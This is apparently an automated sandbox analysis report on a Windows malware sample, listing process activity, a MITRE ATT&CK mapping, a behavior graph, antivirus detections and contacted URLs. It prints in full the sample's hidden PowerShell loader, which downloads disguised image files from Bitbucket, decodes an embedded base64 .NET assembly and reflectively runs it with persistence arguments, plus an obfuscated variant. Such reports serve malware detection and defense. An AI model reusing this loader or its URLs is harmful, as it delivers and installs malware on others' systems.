        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gg#zwbk#gy#a#bk#gy#zwbk#c8#d#bl#hm#d##v#gq#bwb3#g4#b#bv#ge#z#bz#c8#bgbl#hc#xwbp#g0#yqbn#gu#mg#u#go#c#bn#d8#mq#0#dq#ng#x#dc#mg#x#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#gi#aqb0#gi#dqbj#gs#zqb0#c4#bwby#gc#lwbo#gc#z#bm#gg#z#bm#gc#z##v#hq#zqbz#hq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#ygbh#hm#zq#2#dq#t#bl#g4#zwb0#gg#i##9#c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.pngsoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gg#zwbk#gy#a#bk#gy#zwbk#c8#d#bl#hm#d##v#gq#bwb3#g4#b#bv#ge#z#bz#c8#bgbl#hc#xwbp#g0#yqbn#gu#mg#u#go#c#bn#d8#mq#0#dq#ng#x#dc#mg#x#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#gi#aqb0#gi#dqbj#gs#zqb0#c4#bwby#gc#lwbo#gc#z#bm#gg#z#bm#gc#z##v#hq#zqbz#hq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#ygbh#hm#zq#2#dq#t#bl#g4#zwb0#gg#i##9#cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.pngsoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}"Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6FD211258
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD218BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6FD218BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD212D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6FD212D70

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts2
        Native API        		1
        Scripting        		1
        DLL Side-Loading        		1
        Obfuscated Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Software Packing        		LSASS Memory1
        File and Directory Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		1
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Timestomp        		Security Account Manager15
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		NTDS1
        Security Software Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
        Virtualization/Sandbox Evasion        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Access Token Manipulation        		Cached Domain Credentials21
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Rundll32        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524410 Sample: nTHivMbGpg.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 24 bitbucket.org 2->24 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus / Scanner detection for submitted sample 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 7 other signatures 2->38 9 nTHivMbGpg.exe 1 3 2->9         started        11 rundll32.exe 2->11         started        signatures3 process4 process5 13 cmd.exe 1 9->13         started        signatures6 40 Suspicious powershell command line found 13->40 42 Bypasses PowerShell execution policy 13->42 16 powershell.exe 7 13->16         started        19 conhost.exe 13->19         started        process7 signatures8 28 Suspicious powershell command line found 16->28 30 Found suspicious powershell code related to unpacking or dynamic code loading 16->30 21 powershell.exe 14 15 16->21         started        process9 dnsIp10 26 bitbucket.org 185.166.143.50, 443, 49699, 49700 AMAZON-02US Germany 21->26

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        nTHivMbGpg.exe39%ReversingLabsWin64.Trojan.Generic
        nTHivMbGpg.exe100%AviraTR/Agent.blxmm

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.microsoft0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bitbucket.org
        		185.166.143.50
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723true
            		unknown
            https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721true
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.microsoftpowershell.exe, 00000004.00000002.1303077522.0000017DBB3E5000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://admin.atlassian.compowershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-buildspowershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://api.bitbucket.orgpowershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacpowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://preferences.atlassian.compowershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpackpowershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://bitbucket.status.atlassian.com/powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/appowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/vepowershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
